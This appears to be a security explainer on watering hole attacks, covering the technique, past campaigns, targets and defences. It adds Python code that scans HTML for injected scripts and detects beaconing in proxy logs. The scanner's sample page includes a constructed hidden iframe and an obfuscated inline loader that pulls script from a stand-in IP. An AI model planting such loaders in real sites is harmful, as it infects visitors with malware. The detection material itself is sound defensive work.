Watering Hole 101

The term “watering hole” is borrowed from predators that wait at a water source for their prey to come to them. In a watering hole attack, threat actors compromise a carefully selected, legitimate website that their intended victims (targeted businesses and organizations) are known to visit, inserting an exploit so that those visitors are infected with malware.

Senior threat researcher Nart Villeneuve documented the use of the watering hole technique in both targeted and typical cybercriminal attacks as early as 2009 and 2010.

How does a watering hole technique work?

A watering hole attack typically works this way:

Attackers gather strategic information that they can use to gain entry into their targeted organization. This step can be compared to a military reconnaissance mission. The information gathered may include insights on trusted websites often visited by the employees or members of the targeted entity. This deliberate selection of websites to compromise was initially dubbed “strategic web compromises” by Shadowserver.

Attackers insert an exploit into the selected sites, typically as injected JavaScript or a hidden iframe that redirects visitors to an exploit page under the attackers’ control.

Once targeted victims visit the compromised site, the exploit takes advantage of software vulnerabilities, whether long-patched or zero-day, to drop malware. The dropped malware may be in the form of a remote access Trojan (RAT), which allows attackers to access sensitive data and take control of the compromised system.
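The injection step above is what a site owner can look for. The following is an added example, not code from the original article: a small scanner that parses a page’s HTML and flags the artifacts a watering hole injection usually leaves behind (script tags loading from hosts the site does not normally use, zero-size or hidden iframes, and inline scripts that decode and write further script). The sample page, the allow-list of script hosts and the IP addresses (RFC 5737 test ranges) are constructed for illustration.

```python
"""Added example: scan served HTML for injected scripts/iframes.
Not part of the original article; allow-list, hosts and sample page are
constructed for illustration."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed allow-list: origins the site legitimately loads code from.
ALLOWED_SCRIPT_HOSTS = {"www.example-site.test", "cdn.example-site.test"}

# Tokens typical of obfuscated loaders found in injected inline scripts.
SUSPICIOUS_INLINE = ("eval(", "unescape(", "fromCharCode", "document.write(")


class InjectionScanner(HTMLParser):
    """Collects external <script src>, <iframe src> and inline script bodies
    and records the ones that deviate from what the site is known to serve."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._inline_script = ""

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "script":
            src = a.get("src")
            if src:
                # Relative URLs are same-origin and have no hostname; skip them.
                host = urlparse(src).hostname or ""
                if host and host not in ALLOWED_SCRIPT_HOSTS:
                    self.findings.append(("external-script", src))
            else:
                self._in_script = True
                self._inline_script = ""
        elif tag == "iframe":
            src = a.get("src", "")
            style = (a.get("style") or "").replace(" ", "").lower()
            hidden = (a.get("width") in ("0", "1") or a.get("height") in ("0", "1")
                      or "display:none" in style or "visibility:hidden" in style)
            host = urlparse(src).hostname or ""
            if hidden or (host and host not in ALLOWED_SCRIPT_HOSTS):
                self.findings.append(("iframe", src))

    def handle_data(self, data):
        if self._in_script:
            self._inline_script += data

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = self._inline_script
            if any(tok in body for tok in SUSPICIOUS_INLINE):
                self.findings.append(("inline-script", body.strip()[:60]))


def scan_html(html):
    """Return a list of (kind, detail) findings for the given HTML document."""
    parser = InjectionScanner()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: a legitimate page with a hidden iframe and an
# obfuscated inline loader injected before </body>.
SAMPLE_PAGE = """<html><head>
<script src="https://cdn.example-site.test/jquery.js"></script>
<script src="/js/app.js"></script>
</head><body>
<h1>Local Government Association News</h1>
<iframe src="http://198.51.100.7/stat.php" width="0" height="0" style="display:none"></iframe>
<script>var s=unescape("%3Cscript%20src%3D%22http%3A//203.0.113.9/x.js%22%3E%3C/script%3E");document.write(s);</script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE_PAGE):
        print(f"{kind}: {detail}")
```

Run this against a crawl of your own site’s pages and diff the output against a known-good baseline; a new external script host or a zero-size iframe appearing on a page that has not been deliberately changed is exactly the signal a strategic web compromise produces.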

Where is this attack technique used?

Watering hole attacks were previously documented in several high-profile cases which include:

VOHO. In mid-2012 RSA identified a campaign known as VOHO, aimed at a particular set of organizations: businesses and local government agencies in specific geographic areas. The attackers compromised carefully selected sites by inserting malicious JavaScript to deliver a Gh0st RAT variant. Gh0st RATs had previously been seen in other attacks targeting civic organizations and diplomatic entities worldwide.

Attack on high-profile groups. Just before the end of 2012, the Council on Foreign Relations (CFR) website was compromised to host a zero-day exploit for Internet Explorer. Visitors to the site were served a backdoor. Microsoft addressed the vulnerability through Microsoft Security Bulletin MS13-008.

Why is it effective?

For a watering hole attack to be effective, attackers rely on weaknesses in the targeted organization’s defenses: unpatched or outdated systems, or simply the human tendency to trust a familiar site.

In watering hole attacks, the goal is not to serve malware to as many systems as possible. Instead, the attackers run exploits on well-known and trusted sites likely to be visited by their targeted victims. This selectivity is what makes the watering hole technique effective at delivering its intended payload to its intended audience.

Aside from carefully choosing sites to compromise, watering hole attacks are known to incorporate zero-day exploits that target unpatched vulnerabilities. Thus, the targeted entities are left with little or no defense against these exploits.

This doesn’t mean that attackers don’t target patched system vulnerabilities. Because of patch management difficulties in an enterprise setting, IT administrators may delay deploying critical updates. This window of exposure may lead to a targeted attack leveraging old, but reliable vulnerabilities.

Who are the targets of a watering hole attack?

The watering hole technique is used in targeted attacks that aim to gather confidential information and intelligence from the following organizations:

Various businesses

Human rights groups

Government offices

The stolen information, in turn, may be used to initiate more damaging attacks against the affected organization.

What is the impact of these attacks?

The social engineering technique used in watering hole attacks is strategic. Unlike a usual social engineering attack, threat actors employing the watering hole technique carefully select the most appropriate legitimate sites to compromise, instead of targeting random sites. Because the watering hole technique targets trusted and frequented sites, relying solely on visiting trusted sites to avoid online threats is not an effective practice.

In cases where watering hole attacks lead to a RAT, attackers can execute commands on the infected systems, including spying on and monitoring the activities of the target organization. Because the attacker has gained a foothold inside the targeted organization’s network, they can also initiate attacks that are harmful to the organization’s operations, such as modifying or deleting files containing crucial information.

We may be seeing more of attacks using watering hole in the future. Trend Micro vice president for cyber security Tom Kellermann predicted that because of its better methodology, watering hole attacks can become a more popular way to pollute trusted sites in 2013.

What can I do to prevent these attacks?

Timely software updating. For watering hole attacks that employ old vulnerabilities, an organization’s best defense is to update systems with the latest software patches offered by vendors.

Vulnerability shielding. Also known as “virtual patching,” it operates on the premise that an exploit must travel a definable network path to reach a vulnerable application. Vulnerability shielding inspects that traffic for known exploit patterns and for deviations from the protocols normally used, and blocks the exploit before it reaches the unpatched software. This buys administrators time to deploy the vendor patch.

Network traffic detection. Though attackers may swap exploits or payloads between attacks, the traffic generated by the final malware when communicating with its command-and-control servers tends to remain consistent: the same check-in schedule, the same message format, the same hosts. By detecting these communications, organizations can readily implement security measures to prevent the attack from escalating further. Technologies such as Trend Micro Deep Discovery can aid IT administrators in detecting suspicious network traffic.
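The consistency of command-and-control traffic described above is something a defender can test for directly. The following is an added example, not code from the original article or from any Trend Micro product: it parses proxy log lines, groups them by client and destination, and flags flows whose connection timing and request size are both nearly constant, which is how a RAT checking in on a fixed schedule looks next to ordinary browsing. The log format, the hosts, the IP addresses (RFC 5737 test ranges) and the thresholds are constructed assumptions; adjust them to your own proxy’s format and traffic.

```python
"""Added example: flag beacon-like outbound flows in proxy logs.
Not part of the original article; log format, hosts and thresholds are
constructed for illustration."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed log lines: "<ISO timestamp> <client ip> <method> <host> <status> <bytes>".
# One client browses a news site and webmail, and also POSTs a ~310-byte
# message to 203.0.113.9 every five minutes (the beacon).
SAMPLE_LOG = """\
2013-01-08T09:00:02 10.1.4.22 GET www.example-news.test 200 48211
2013-01-08T09:00:05 10.1.4.22 POST 203.0.113.9 200 312
2013-01-08T09:03:41 10.1.4.22 GET mail.example-site.test 200 9112
2013-01-08T09:05:05 10.1.4.22 POST 203.0.113.9 200 310
2013-01-08T09:07:13 10.1.4.22 GET mail.example-site.test 200 10034
2013-01-08T09:10:06 10.1.4.22 POST 203.0.113.9 200 315
2013-01-08T09:15:05 10.1.4.22 POST 203.0.113.9 200 309
2013-01-08T09:20:05 10.1.4.22 POST 203.0.113.9 200 311
2013-01-08T09:31:59 10.1.4.22 GET mail.example-site.test 200 8120
2013-01-08T09:44:20 10.1.4.22 GET mail.example-site.test 200 9987
2013-01-08T09:59:01 10.1.4.22 GET mail.example-site.test 200 7012
"""


def parse_log(text):
    """Group (timestamp, bytes) events by (client, destination host)."""
    flows = defaultdict(list)
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, src, _method, host, _status, size = line.split()
        flows[(src, host)].append((datetime.fromisoformat(ts), int(size)))
    return flows


def beacon_score(events):
    """Return (mean_interval_s, interval_cv, size_cv) for a flow's events.
    A low coefficient of variation in both timing and size is the signature
    of an implant checking in on a fixed schedule with a fixed-format message."""
    events = sorted(events)
    gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
    sizes = [size for _, size in events]
    gap_mean = mean(gaps)
    gap_cv = pstdev(gaps) / gap_mean if gap_mean else 0.0
    size_cv = pstdev(sizes) / mean(sizes)
    return gap_mean, gap_cv, size_cv


def find_beacons(flows, min_events=5, max_gap_cv=0.1, max_size_cv=0.1):
    """Return flows that look like beacons under the given thresholds."""
    hits = []
    for (src, host), events in flows.items():
        if len(events) < min_events:
            continue  # too few samples to judge periodicity
        interval, gap_cv, size_cv = beacon_score(events)
        if gap_cv <= max_gap_cv and size_cv <= max_size_cv:
            hits.append({"src": src, "host": host,
                         "interval_s": round(interval), "events": len(events)})
    return hits


if __name__ == "__main__":
    for hit in find_beacons(parse_log(SAMPLE_LOG)):
        print(f"possible beacon: {hit['src']} -> {hit['host']} "
              f"every ~{hit['interval_s']}s ({hit['events']} events)")
```

The webmail flow has five events too, but its gaps range from a few minutes to nearly half an hour, so its interval variation is far above the threshold and it is not reported; only the five-minute POSTs to 203.0.113.9 are. In production, run this over a day of logs rather than an hour, add jitter tolerance (real implants often randomize the interval slightly, which is why the threshold is a ratio rather than an absolute value), and enrich hits with destination reputation before alerting.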

Correlating well-known APT activities. Using big data analytics, organizations can gain insight into whether they are affected by a targeted attack by correlating in-the-wild cybercrime activities with what is happening on the enterprise’s own network.

Organizations should also consider building their own local intelligence to document previous cases of targeted attacks within the company. These enable organizations to spot possible correlations and insights needed to create an effective action or recovery plan.

"While cybercriminals use “drive-by” exploits to indiscriminately compromise as many computers as they can, the use of this technique in relation to APT activity is what Shadowserver aptly described as “strategic web compromises.” The objective is to selectively target visitors interested in specific content. Such attacks often emerge in conjunction with a new drive-by exploit." – Nart Villeneuve, senior threat researcher